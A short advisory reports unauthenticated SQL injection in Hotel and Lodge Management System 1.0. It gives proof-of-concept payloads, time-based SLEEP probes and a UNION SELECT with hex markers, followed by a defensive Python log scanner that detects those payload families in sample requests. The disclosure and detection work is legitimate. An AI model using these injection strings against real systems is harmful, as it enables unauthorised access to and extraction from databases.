Hotel and Lodge Management System 1.0 SQLi

Disclosure date: 10/23/19


Hotel and Lodge Management System is vulnerable to unauthenticated SQL injection that can allow remote attackers to execute arbitrary SQL commands via the Customer, Room, Currency, Room Booking Details, and Tax Details functions.

Proof of Concept:

' AND SLEEP(5)-- KAsX
' AND SLEEP(5)-- vAKj
' UNION ALL SELECT 9678,CONCAT(0x716a766b71,0x415a5770735a5043434749544b436b4a76686e7665576a446d72437a594969414c4349517655476b,0x7162767871),9678-- EVUO
' AND SLEEP(5)-- hHTj
' AND SLEEP(5)-- RLDn
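
A defender-side check for the two payload families in the proof of concept (time-based blind with SLEEP, and UNION with hex-encoded CONCAT markers), as an added example that is not part of the original advisory. The log lines, request path and parameter name are constructed, since the advisory does not give the affected URLs.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Signatures for the two payload families in the proof of concept.
TIME_BASED = re.compile(r"\b(?:AND|OR)\s+SLEEP\s*\(\s*\d+\s*\)", re.I)
UNION_HEX = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b.*\bCONCAT\s*\(\s*0x[0-9a-f]+", re.I | re.S)
TRAILING_COMMENT = re.compile(r"--\s+\w*\s*$")
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample lines; the path and parameter name are hypothetical.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2020:10:00:00 +0000] "GET /example/list?name=Smith HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2020:10:00:05 +0000] "GET /example/list?name=x%27%20AND%20SLEEP(5)--%20abcd HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2020:10:00:09 +0000] "GET /example/list?name=x%27+UNION+ALL+SELECT+1,CONCAT(0x41,0x42),1--+abcd HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2020:10:00:12 +0000] "GET /example/list?name=x%2527%2520AND%2520SLEEP(5)--%2520abcd HTTP/1.1" 200 512',
]

def normalise(value, rounds=3):
    """URL-decode a bounded number of times so double-encoded input is inspected too."""
    for _ in range(rounds):
        value, previous = unquote_plus(value), value
        if value == previous:
            break
    return value

def classify(value):
    """Return the sorted findings for one parameter value."""
    text, findings = normalise(value), set()
    if TIME_BASED.search(text):
        findings.add("time-based-blind")
    if UNION_HEX.search(text):
        findings.add("union-hex-marker")
    if findings and "'" in text and TRAILING_COMMENT.search(text):
        findings.add("quote-break-with-comment")
    return sorted(findings)

def scan(lines):
    """Map 1-based log line numbers to findings across all query parameters."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        found = set()
        for _name, value in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
            found.update(classify(value))
        if found:
            hits[number] = sorted(found)
    return hits
```

Signature matching like this is a triage aid for logs and does not replace fixing the affected functions with parameterized queries.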